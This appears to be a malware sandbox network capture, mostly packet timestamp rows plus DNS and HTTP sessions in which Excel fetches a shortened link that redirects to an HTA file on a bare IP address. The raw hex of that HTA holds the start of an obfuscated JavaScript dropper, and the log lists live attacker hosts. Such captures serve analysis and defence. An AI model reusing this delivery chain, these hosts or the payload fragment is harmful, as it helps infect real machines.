                        Jul 3, 2024 18:03:46.699002981 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.699018955 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.699029922 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:46.699033022 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.699055910 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:46.699513912 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.699529886 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.699551105 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.699553967 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:46.699565887 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.699580908 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.699592113 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:46.699596882 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.699611902 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.699620008 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:46.699628115 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.699651003 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:46.700228930 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.700244904 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.700268030 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:46.700349092 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.700365067 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.700392008 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:46.700579882 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.700594902 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.700623989 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:46.700649977 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.700666904 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.700681925 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.700705051 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:46.701010942 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.701026917 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.701041937 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.701056004 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.701064110 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:46.701071978 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.701087952 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.701092958 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:46.701133013 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:46.701260090 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.701276064 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.701292038 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.701307058 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.701316118 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:46.701322079 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.701337099 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.701343060 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:46.701353073 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.701380968 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:46.701675892 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.701719046 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:46.703113079 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.703193903 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.703208923 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.703231096 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:46.704087973 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.704103947 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.704121113 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.704130888 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:46.704153061 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:46.704251051 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.704267979 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.704283953 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.704299927 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.704305887 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:46.704364061 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:46.704423904 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.704440117 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.704463959 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.704478979 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.704494953 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:46.704502106 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.704519033 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.704526901 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:46.704555988 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:46.704777956 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.704896927 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.704911947 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.704940081 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:46.704960108 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.704974890 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.704989910 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.704999924 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:46.705024958 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:46.742417097 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.742479086 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.742513895 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.742543936 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:46.742675066 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.742707968 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.742734909 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:46.742741108 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.742784023 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:46.786494970 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.786529064 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.786581039 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.786598921 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:46.786616087 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.786649942 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.786663055 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:46.786684036 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.786722898 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:46.786735058 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.786951065 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.786979914 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.787009954 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:46.787029982 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.787064075 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.787075996 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:46.787096977 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.787130117 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.787141085 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:46.787163019 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.787194967 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.787205935 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:46.787228107 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.787261963 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.787266970 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:46.787550926 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.787595987 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:46.787656069 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.787693024 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.787724972 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.787739038 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:46.787758112 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.787790060 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.787794113 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:46.787825108 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.787858009 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.787873983 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:46.787894011 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.787941933 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:46.788250923 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.788283110 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.788330078 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:46.788332939 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.788364887 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.788397074 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.788407087 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:46.788434029 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.788475990 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:46.788499117 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.788532019 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.788564920 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.788572073 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:46.789083004 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.789114952 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.789130926 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:46.789163113 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.789195061 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.789203882 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:46.789228916 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.789261103 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.789272070 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:46.789294004 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.789324999 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.789334059 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:46.789360046 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.789392948 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.789401054 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:46.789426088 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.789458036 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.789467096 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:46.789968014 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.790003061 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.790010929 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:46.790036917 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.790069103 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.790077925 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:46.790102005 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.790134907 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.790142059 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:46.790168047 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.790201902 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.790205956 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:46.790230989 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.790277958 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:46.791796923 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.791851044 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.791893005 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:46.791927099 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.791980028 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.792013884 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.792016029 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:46.792093992 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.792125940 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.792134047 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:46.792160988 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.792201996 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:46.792288065 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.792320013 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.792351961 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.792356968 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:46.792386055 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.792418957 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.792426109 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:46.792452097 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.792499065 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:46.792500019 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.792809010 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.792841911 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.792851925 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:46.792876005 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.792907000 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.792911053 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:46.792939901 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.792973042 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.792982101 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:46.793006897 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.793037891 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.793045044 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:46.793071032 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.793102980 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.793109894 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:46.793135881 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.793169022 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.793176889 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:46.793200970 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.793234110 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.793242931 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:46.793268919 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.793308973 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:46.793622971 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.793654919 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.793689013 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.793694973 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:46.793739080 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.793771982 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.793776989 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:46.793804884 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.793837070 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.793838978 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:46.793870926 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.793915987 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:46.794107914 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.794141054 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.794173002 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.794184923 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:46.794205904 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.794239044 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.794240952 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:46.794271946 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.794303894 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.794306040 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:46.794337988 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.794384956 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:46.794621944 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.794673920 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.794708014 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:46.794711113 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:47.006302118 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:47.007992029 CEST8049172198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:47.008080006 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:47.042345047 CEST4917280192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:47.045516968 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:47.045609951 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:47.108026981 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:52.334657907 CEST4917380192.168.2.22208.95.112.1
                        Jul 3, 2024 18:03:52.339576960 CEST8049173208.95.112.1192.168.2.22
                        Jul 3, 2024 18:03:52.339631081 CEST4917380192.168.2.22208.95.112.1
                        Jul 3, 2024 18:03:52.340533018 CEST4917380192.168.2.22208.95.112.1
                        Jul 3, 2024 18:03:52.345320940 CEST8049173208.95.112.1192.168.2.22
                        Jul 3, 2024 18:03:52.855227947 CEST8049173208.95.112.1192.168.2.22
                        Jul 3, 2024 18:03:53.064042091 CEST8049173208.95.112.1192.168.2.22
                        Jul 3, 2024 18:03:53.064107895 CEST4917380192.168.2.22208.95.112.1
                        TimestampSource PortDest PortSource IPDest IP
                        Jul 3, 2024 18:03:26.137871981 CEST5456253192.168.2.228.8.8.8
                        Jul 3, 2024 18:03:26.144912004 CEST53545628.8.8.8192.168.2.22
                        Jul 3, 2024 18:03:27.659300089 CEST5291753192.168.2.228.8.8.8
                        Jul 3, 2024 18:03:27.895956039 CEST53529178.8.8.8192.168.2.22
                        Jul 3, 2024 18:03:27.897048950 CEST5291753192.168.2.228.8.8.8
                        Jul 3, 2024 18:03:27.904735088 CEST53529178.8.8.8192.168.2.22
                        Jul 3, 2024 18:03:51.713913918 CEST6275153192.168.2.228.8.8.8
                        Jul 3, 2024 18:03:51.723656893 CEST53627518.8.8.8192.168.2.22
                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                        Jul 3, 2024 18:03:26.137871981 CEST192.168.2.228.8.8.80x84bbStandard query (0)hop.fyiA (IP address)IN (0x0001)false
                        Jul 3, 2024 18:03:27.659300089 CEST192.168.2.228.8.8.80xe13fStandard query (0)hop.fyiA (IP address)IN (0x0001)false
                        Jul 3, 2024 18:03:27.897048950 CEST192.168.2.228.8.8.80xe13fStandard query (0)hop.fyiA (IP address)IN (0x0001)false
                        Jul 3, 2024 18:03:51.713913918 CEST192.168.2.228.8.8.80x3f64Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                        Jul 3, 2024 18:03:26.144912004 CEST8.8.8.8192.168.2.220x84bbNo error (0)hop.fyi192.185.89.92A (IP address)IN (0x0001)false
                        Jul 3, 2024 18:03:27.895956039 CEST8.8.8.8192.168.2.220xe13fNo error (0)hop.fyi192.185.89.92A (IP address)IN (0x0001)false
                        Jul 3, 2024 18:03:27.904735088 CEST8.8.8.8192.168.2.220xe13fNo error (0)hop.fyi192.185.89.92A (IP address)IN (0x0001)false
                        Jul 3, 2024 18:03:51.723656893 CEST8.8.8.8192.168.2.220x3f64No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                        • hop.fyi
                        • 198.46.178.144
                        • 94.156.65.247
                        • 91.92.254.194
                        • ip-api.com
                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.2249165192.185.89.92801704C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        TimestampBytes transferredDirectionData
                        Jul 3, 2024 18:03:26.156271935 CEST319OUTGET /ppltL HTTP/1.1
                        Accept: */*
                        UA-CPU: AMD64
                        Accept-Encoding: gzip, deflate
                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                        Host: hop.fyi
                        Connection: Keep-Alive
                        Jul 3, 2024 18:03:26.746568918 CEST627INHTTP/1.1 301 Moved Permanently
                        Date: Wed, 03 Jul 2024 16:03:26 GMT
                        Server: Apache
                        Cache-Control: no-cache, no-store, private
                        Expires: -1
                        Upgrade: h2,h2c
                        Connection: Upgrade, Keep-Alive
                        Location: http://198.46.178.144/EvengIEcache.hta
                        Vary: Accept-Encoding
                        Content-Encoding: gzip
                        Access-Control-Allow-Origin: *
                        Content-Length: 212
                        Keep-Alive: timeout=5, max=75
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 90 c1 0e 82 30 0c 86 ef 3e c5 dc c5 13 9b 24 44 51 07 17 c5 c4 93 c6 e0 c1 e3 1c 95 91 20 e8 28 26 be bd 93 99 90 70 a2 97 b6 49 fb f7 ff 2a a6 bb e3 36 bd 9e 12 a2 f1 51 c6 13 e1 12 b1 21 34 c8 cc 95 5d fb 00 94 44 69 69 1a c0 88 5e d2 bd 17 52 c2 87 03 1a f1 e9 c1 ab 2d de 11 35 70 37 d0 68 4a 54 5d 21 54 76 6b be 69 4d 19 cd 7e 43 6b ce fd 55 c8 82 05 f3 97 21 f3 83 80 27 6f a8 f2 43 a2 a4 d2 c0 34 ca 59 27 df eb 63 81 25 c4 67 c8 0a 03 0a 8b 2a 27 58 93 71 52 82 bb 65 07 c6 7b 32 71 ab b3 4f cf 30 10 17 96 c7 42 44 74 dc 15 1a 8f 75 23 63 f6 b7 e2 ee 5b 4b bf bf 7f 01 56 57 01 9f 8e 01 00 00
                        Data Ascii: 0>$DQ (&pI*6Q!4]Dii^R-5p7hJT]!TvkiM~CkU!'oC4Y'c%g*'XqRe{2qO0BDtu#c[KVW


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        1192.168.2.2249166198.46.178.144801704C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        TimestampBytes transferredDirectionData
                        Jul 3, 2024 18:03:26.763056993 CEST337OUTGET /EvengIEcache.hta HTTP/1.1
                        Accept: */*
                        UA-CPU: AMD64
                        Accept-Encoding: gzip, deflate
                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                        Host: 198.46.178.144
                        Connection: Keep-Alive
                        Jul 3, 2024 18:03:27.269331932 CEST1236INHTTP/1.1 200 OK
                        Content-Type: application/hta
                        Last-Modified: Tue, 02 Jul 2024 07:10:04 GMT
                        Accept-Ranges: bytes
                        ETag: "d0282dd4eccda1:0"
                        Server: Microsoft-IIS/10.0
                        Date: Wed, 03 Jul 2024 16:03:27 GMT
                        Content-Length: 105733
                        Data Raw: 3c 53 63 72 69 70 74 20 4c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 73 63 72 69 70 74 27 3e 0d 0a 3c 21 2d 2d 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 75 6e 65 73 63 61 70 65 28 27 25 33 43 25 37 33 25 36 33 25 37 32 25 36 39 25 37 30 25 37 34 25 32 30 25 36 43 25 36 31 25 36 45 25 36 37 25 37 35 25 36 31 25 36 37 25 36 35 25 33 44 25 34 41 25 36 31 25 37 36 25 36 31 25 35 33 25 36 33 25 37 32 25 36 39 25 37 30 25 37 34 25 33 45 25 36 44 25 33 44 25 32 37 25 32 35 25 33 33 25 34 33 25 32 35 25 33 32 25 33 31 25 34 34 25 34 46 25 34 33 25 35 34 25 35 39 25 35 30 25 34 35 25 32 35 25 33 32 25 33 30 25 36 38 25 37 34 25 36 44 25 36 43 25 32 35 25 33 33 25 34 35 25 32 35 25 33 30 25 34 31 25 32 35 25 33 33 25 34 33 25 36 44 25 36 35 25 37 34 25 36 31 25 32 35 25 33 32 25 33 30 25 36 38 25 37 34 25 37 34 25 37 30 25 32 44 25 36 35 25 37 31 25 37 35 25 36 39 25 37 36 25 32 35 25 33 33 25 34 34 25 32 35 25 33 32 25 33 32 25 35 38 25 32 44 25 35 35 25 34 31 25 32 44 25 34 33 25 36 46 25 36 44 25 37 [TRUNCATED]
